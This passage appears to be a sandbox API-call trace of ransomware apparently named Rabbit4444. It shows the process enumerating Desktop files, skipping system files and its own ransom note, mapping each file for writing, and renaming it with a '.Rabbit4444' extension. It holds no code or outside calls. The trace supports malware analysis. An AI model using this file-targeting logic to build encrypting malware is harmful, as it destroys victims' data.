lstrcmpiW (lpString1="m1HgOc.bmp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.089] lstrcmpiW (lpString1="m1HgOc.bmp", lpString2="Rabbit4444.exe") returned -1 [0050.089] lstrcmpiW (lpString1="m1HgOc.bmp", lpString2=".") returned 1 [0050.089] lstrcmpiW (lpString1="m1HgOc.bmp", lpString2="..") returned 1 [0050.089] lstrcmpiW (lpString1="m1HgOc.bmp", lpString2="windows") returned -1 [0050.089] lstrcmpiW (lpString1="m1HgOc.bmp", lpString2="bootmgr") returned 1 [0050.089] lstrcmpiW (lpString1="m1HgOc.bmp", lpString2="pagefile.sys") returned -1 [0050.089] lstrcmpiW (lpString1="m1HgOc.bmp", lpString2="boot") returned 1 [0050.089] lstrcmpiW (lpString1="m1HgOc.bmp", lpString2="ids.txt") returned 1 [0050.089] lstrcmpiW (lpString1="m1HgOc.bmp", lpString2="NTUSER.DAT") returned -1 [0050.089] lstrcpyW (in: lpString1=0x130eb68, lpString2="m1HgOc.bmp" | out: lpString1="m1HgOc.bmp") returned="m1HgOc.bmp" [0050.089] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\m1HgOc.bmp", dwFileAttributes=0x0) returned 1 [0050.089] lstrlenW (lpString="m1HgOc.bmp") returned 10 [0050.089] lstrlenW (lpString="Rabbit4444") returned 10 [0050.089] lstrcmpiW (lpString1="m1HgOc.bmp", lpString2="Rabbit4444") returned -1 [0050.089] lstrlenW (lpString=".dll") returned 4 [0050.089] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0050.089] lstrlenW (lpString=".lnk") returned 4 [0050.089] lstrcmpiW (lpString1=".bmp", lpString2=".lnk") returned -1 [0050.089] lstrlenW (lpString=".ini") returned 4 [0050.089] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0050.089] lstrlenW (lpString=".sys") returned 4 [0050.089] lstrcmpiW (lpString1=".bmp", lpString2=".sys") returned -1 [0050.089] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\m1HgOc.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\m1hgoc.bmp"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.090] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.090] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14140040506) returned 1 [0050.090] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=96020) returned 1 [0050.090] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0050.090] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0050.090] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x17a20, lpName=0x0) returned 0x298 [0050.090] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17a20) returned 0x70000 [0050.092] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.092] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0050.092] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.092] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0050.092] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.093] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0050.093] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.093] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0050.093] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14140340925) returned 1 [0050.093] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0050.093] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0050.093] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.094] CloseHandle (hObject=0x298) returned 1 [0050.094] CloseHandle (hObject=0x278) returned 1 [0050.095] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\m1HgOc.bmp.Rabbit4444") returned 45 [0050.095] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\m1HgOc.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\m1hgoc.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\m1HgOc.bmp.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\desktop\\m1hgoc.bmp.rabbit4444"), dwFlags=0x1) returned 1 [0050.096] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58035260, ftCreationTime.dwHighDateTime=0x1d4c9c5, ftLastAccessTime.dwLowDateTime=0x63a8bf30, ftLastAccessTime.dwHighDateTime=0x1d4cbcb, ftLastWriteTime.dwLowDateTime=0x63a8bf30, ftLastWriteTime.dwHighDateTime=0x1d4cbcb, nFileSizeHigh=0x0, nFileSizeLow=0x8f1f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="N3hw-iK.m4a", cAlternateFileName="")) returned 1 [0050.096] lstrcmpiW (lpString1="N3hw-iK.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.096] lstrcmpiW (lpString1="N3hw-iK.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.096] lstrcmpiW (lpString1="N3hw-iK.m4a", lpString2="Rabbit4444.exe") returned -1 [0050.096] lstrcmpiW (lpString1="N3hw-iK.m4a", lpString2=".") returned 1 [0050.096] lstrcmpiW (lpString1="N3hw-iK.m4a", lpString2="..") returned 1 [0050.096] lstrcmpiW (lpString1="N3hw-iK.m4a", lpString2="windows") returned -1 [0050.096] lstrcmpiW (lpString1="N3hw-iK.m4a", lpString2="bootmgr") returned 1 [0050.096] lstrcmpiW (lpString1="N3hw-iK.m4a", lpString2="pagefile.sys") returned -1 [0050.096] lstrcmpiW (lpString1="N3hw-iK.m4a", lpString2="boot") returned 1 [0050.096] lstrcmpiW (lpString1="N3hw-iK.m4a", lpString2="ids.txt") returned 1 [0050.096] lstrcmpiW (lpString1="N3hw-iK.m4a", lpString2="NTUSER.DAT") returned -1 [0050.096] lstrcpyW (in: lpString1=0x130eb68, lpString2="N3hw-iK.m4a" | out: lpString1="N3hw-iK.m4a") returned="N3hw-iK.m4a" [0050.096] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\N3hw-iK.m4a", dwFileAttributes=0x0) returned 1 [0050.097] lstrlenW (lpString="N3hw-iK.m4a") returned 11 [0050.097] lstrlenW (lpString="Rabbit4444") returned 10 [0050.097] lstrcmpiW (lpString1="3hw-iK.m4a", lpString2="Rabbit4444") returned -1 [0050.097] lstrlenW (lpString=".dll") returned 4 [0050.097] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0050.097] lstrlenW (lpString=".lnk") returned 4 [0050.097] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0050.097] lstrlenW (lpString=".ini") returned 4 [0050.097] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0050.097] lstrlenW (lpString=".sys") returned 4 [0050.097] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0050.097] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\N3hw-iK.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\n3hw-ik.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.097] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.097] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14140794009) returned 1 [0050.097] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=36639) returned 1 [0050.097] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0050.097] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0050.097] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9220, lpName=0x0) returned 0x298 [0050.097] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9220) returned 0x70000 [0050.099] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.099] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0050.099] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.099] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0050.099] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.099] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0050.099] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.099] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0050.099] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14141015586) returned 1 [0050.099] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0050.099] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0050.100] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.100] CloseHandle (hObject=0x298) returned 1 [0050.100] CloseHandle (hObject=0x278) returned 1 [0050.101] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\N3hw-iK.m4a.Rabbit4444") returned 46 [0050.101] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\N3hw-iK.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\n3hw-ik.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\N3hw-iK.m4a.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\desktop\\n3hw-ik.m4a.rabbit4444"), dwFlags=0x1) returned 1 [0050.102] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42d91120, ftCreationTime.dwHighDateTime=0x1d4c6b1, ftLastAccessTime.dwLowDateTime=0xb7b3ef50, ftLastAccessTime.dwHighDateTime=0x1d4d201, ftLastWriteTime.dwLowDateTime=0xb7b3ef50, ftLastWriteTime.dwHighDateTime=0x1d4d201, nFileSizeHigh=0x0, nFileSizeLow=0x28a8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PT36K2PFOA8Wd0big.wav", cAlternateFileName="PT36K2~1.WAV")) returned 1 [0050.102] lstrcmpiW (lpString1="PT36K2PFOA8Wd0big.wav", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.102] lstrcmpiW (lpString1="PT36K2PFOA8Wd0big.wav", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.102] lstrcmpiW (lpString1="PT36K2PFOA8Wd0big.wav", lpString2="Rabbit4444.exe") returned -1 [0050.102] lstrcmpiW (lpString1="PT36K2PFOA8Wd0big.wav", lpString2=".") returned 1 [0050.102] lstrcmpiW (lpString1="PT36K2PFOA8Wd0big.wav", lpString2="..") returned 1 [0050.102] lstrcmpiW (lpString1="PT36K2PFOA8Wd0big.wav", lpString2="windows") returned -1 [0050.102] lstrcmpiW (lpString1="PT36K2PFOA8Wd0big.wav", lpString2="bootmgr") returned 1 [0050.102] lstrcmpiW (lpString1="PT36K2PFOA8Wd0big.wav", lpString2="pagefile.sys") returned 1 [0050.102] lstrcmpiW (lpString1="PT36K2PFOA8Wd0big.wav", lpString2="boot") returned 1 [0050.102] lstrcmpiW (lpString1="PT36K2PFOA8Wd0big.wav", lpString2="ids.txt") returned 1 [0050.102] lstrcmpiW (lpString1="PT36K2PFOA8Wd0big.wav", lpString2="NTUSER.DAT") returned 1 [0050.102] lstrcpyW (in: lpString1=0x130eb68, lpString2="PT36K2PFOA8Wd0big.wav" | out: lpString1="PT36K2PFOA8Wd0big.wav") returned="PT36K2PFOA8Wd0big.wav" [0050.102] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\PT36K2PFOA8Wd0big.wav", dwFileAttributes=0x0) returned 1 [0050.102] lstrlenW (lpString="PT36K2PFOA8Wd0big.wav") returned 21 [0050.102] lstrlenW (lpString="Rabbit4444") returned 10 [0050.102] lstrcmpiW (lpString1="Wd0big.wav", lpString2="Rabbit4444") returned 1 [0050.102] lstrlenW (lpString=".dll") returned 4 [0050.102] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0050.102] lstrlenW (lpString=".lnk") returned 4 [0050.102] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0050.102] lstrlenW (lpString=".ini") returned 4 [0050.102] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0050.102] lstrlenW (lpString=".sys") returned 4 [0050.102] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0050.102] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\PT36K2PFOA8Wd0big.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\pt36k2pfoa8wd0big.wav"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.102] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.103] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14141327987) returned 1 [0050.103] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=10408) returned 1 [0050.103] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0050.103] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0050.103] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2bb0, lpName=0x0) returned 0x298 [0050.103] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2bb0) returned 0x70000 [0050.103] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.103] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0050.103] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.103] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0050.103] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.104] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0050.104] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.104] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0050.104] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14141453638) returned 1 [0050.104] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0050.104] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0050.104] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.104] CloseHandle (hObject=0x298) returned 1 [0050.104] CloseHandle (hObject=0x278) returned 1 [0050.105] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\PT36K2PFOA8Wd0big.wav.Rabbit4444") returned 56 [0050.105] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\PT36K2PFOA8Wd0big.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\pt36k2pfoa8wd0big.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\PT36K2PFOA8Wd0big.wav.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\desktop\\pt36k2pfoa8wd0big.wav.rabbit4444"), dwFlags=0x1) returned 1 [0050.105] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x586db950, ftCreationTime.dwHighDateTime=0x1d4c71a, ftLastAccessTime.dwLowDateTime=0xdf627010, ftLastAccessTime.dwHighDateTime=0x1d4d23f, ftLastWriteTime.dwLowDateTime=0xdf627010, ftLastWriteTime.dwHighDateTime=0x1d4d23f, nFileSizeHigh=0x0, nFileSizeLow=0x17c12, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qd_icl1FnCPEAdw.mp3", cAlternateFileName="QD_ICL~1.MP3")) returned 1 [0050.105] lstrcmpiW (lpString1="qd_icl1FnCPEAdw.mp3", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.105] lstrcmpiW (lpString1="qd_icl1FnCPEAdw.mp3", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.105] lstrcmpiW (lpString1="qd_icl1FnCPEAdw.mp3", lpString2="Rabbit4444.exe") returned -1 [0050.105] lstrcmpiW (lpString1="qd_icl1FnCPEAdw.mp3", lpString2=".") returned 1 [0050.105] lstrcmpiW (lpString1="qd_icl1FnCPEAdw.mp3", lpString2="..") returned 1 [0050.105] lstrcmpiW (lpString1="qd_icl1FnCPEAdw.mp3", lpString2="windows") returned -1 [0050.105] lstrcmpiW (lpString1="qd_icl1FnCPEAdw.mp3", lpString2="bootmgr") returned 1 [0050.105] lstrcmpiW (lpString1="qd_icl1FnCPEAdw.mp3", lpString2="pagefile.sys") returned 1 [0050.105] lstrcmpiW (lpString1="qd_icl1FnCPEAdw.mp3", lpString2="boot") returned 1 [0050.106] lstrcmpiW (lpString1="qd_icl1FnCPEAdw.mp3", lpString2="ids.txt") returned 1 [0050.106] lstrcmpiW (lpString1="qd_icl1FnCPEAdw.mp3", lpString2="NTUSER.DAT") returned 1 [0050.106] lstrcpyW (in: lpString1=0x130eb68, lpString2="qd_icl1FnCPEAdw.mp3" | out: lpString1="qd_icl1FnCPEAdw.mp3") returned="qd_icl1FnCPEAdw.mp3" [0050.106] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\qd_icl1FnCPEAdw.mp3", dwFileAttributes=0x0) returned 1 [0050.106] lstrlenW (lpString="qd_icl1FnCPEAdw.mp3") returned 19 [0050.106] lstrlenW (lpString="Rabbit4444") returned 10 [0050.106] lstrcmpiW (lpString1="CPEAdw.mp3", lpString2="Rabbit4444") returned -1 [0050.106] lstrlenW (lpString=".dll") returned 4 [0050.106] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0050.106] lstrlenW (lpString=".lnk") returned 4 [0050.106] lstrcmpiW (lpString1=".mp3", lpString2=".lnk") returned 1 [0050.106] lstrlenW (lpString=".ini") returned 4 [0050.106] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0050.106] lstrlenW (lpString=".sys") returned 4 [0050.106] lstrcmpiW (lpString1=".mp3", lpString2=".sys") returned -1 [0050.106] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\qd_icl1FnCPEAdw.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\qd_icl1fncpeadw.mp3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.106] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.106] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14141703218) returned 1 [0050.106] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=97298) returned 1 [0050.106] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0050.106] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0050.106] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x17f20, lpName=0x0) returned 0x298 [0050.107] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17f20) returned 0x70000 [0050.109] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.109] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0050.109] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.109] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0050.109] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.109] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0050.109] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.109] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0050.109] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14142017814) returned 1 [0050.109] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0050.110] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0050.110] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.110] CloseHandle (hObject=0x298) returned 1 [0050.111] CloseHandle (hObject=0x278) returned 1 [0050.111] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\qd_icl1FnCPEAdw.mp3.Rabbit4444") returned 54 [0050.111] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\qd_icl1FnCPEAdw.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\qd_icl1fncpeadw.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\qd_icl1FnCPEAdw.mp3.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\desktop\\qd_icl1fncpeadw.mp3.rabbit4444"), dwFlags=0x1) returned 1 [0050.112] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3844f3a0, ftCreationTime.dwHighDateTime=0x1d4d359, ftLastAccessTime.dwLowDateTime=0x64501e60, ftLastAccessTime.dwHighDateTime=0x1d4ce1e, ftLastWriteTime.dwLowDateTime=0x64501e60, ftLastWriteTime.dwHighDateTime=0x1d4ce1e, nFileSizeHigh=0x0, nFileSizeLow=0x68ef, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qRlW8xjuiQwW5.bmp", cAlternateFileName="QRLW8X~1.BMP")) returned 1 [0050.112] lstrcmpiW (lpString1="qRlW8xjuiQwW5.bmp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.112] lstrcmpiW (lpString1="qRlW8xjuiQwW5.bmp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.112] lstrcmpiW (lpString1="qRlW8xjuiQwW5.bmp", lpString2="Rabbit4444.exe") returned -1 [0050.112] lstrcmpiW (lpString1="qRlW8xjuiQwW5.bmp", lpString2=".") returned 1 [0050.112] lstrcmpiW (lpString1="qRlW8xjuiQwW5.bmp", lpString2="..") returned 1 [0050.112] lstrcmpiW (lpString1="qRlW8xjuiQwW5.bmp", lpString2="windows") returned -1 [0050.112] lstrcmpiW (lpString1="qRlW8xjuiQwW5.bmp", lpString2="bootmgr") returned 1 [0050.112] lstrcmpiW (lpString1="qRlW8xjuiQwW5.bmp", lpString2="pagefile.sys") returned 1 [0050.112] lstrcmpiW (lpString1="qRlW8xjuiQwW5.bmp", lpString2="boot") returned 1 [0050.112] lstrcmpiW (lpString1="qRlW8xjuiQwW5.bmp", lpString2="ids.txt") returned 1 [0050.112] lstrcmpiW (lpString1="qRlW8xjuiQwW5.bmp", lpString2="NTUSER.DAT") returned 1 [0050.112] lstrcpyW (in: lpString1=0x130eb68, lpString2="qRlW8xjuiQwW5.bmp" | out: lpString1="qRlW8xjuiQwW5.bmp") returned="qRlW8xjuiQwW5.bmp" [0050.112] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\qRlW8xjuiQwW5.bmp", dwFileAttributes=0x0) returned 1 [0050.112] lstrlenW (lpString="qRlW8xjuiQwW5.bmp") returned 17 [0050.112] lstrlenW (lpString="Rabbit4444") returned 10 [0050.112] lstrcmpiW (lpString1="uiQwW5.bmp", lpString2="Rabbit4444") returned 1 [0050.112] lstrlenW (lpString=".dll") returned 4 [0050.112] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0050.112] lstrlenW (lpString=".lnk") returned 4 [0050.112] lstrcmpiW (lpString1=".bmp", lpString2=".lnk") returned -1 [0050.112] lstrlenW (lpString=".ini") returned 4 [0050.112] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0050.112] lstrlenW (lpString=".sys") returned 4 [0050.112] lstrcmpiW (lpString1=".bmp", lpString2=".sys") returned -1 [0050.112] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\qRlW8xjuiQwW5.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\qrlw8xjuiqww5.bmp"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.112] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.113] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14142328362) returned 1 [0050.113] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=26863) returned 1 [0050.113] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0050.113] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0050.113] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6bf0, lpName=0x0) returned 0x298 [0050.113] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6bf0) returned 0x70000 [0050.114] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.114] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0050.114] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.114] 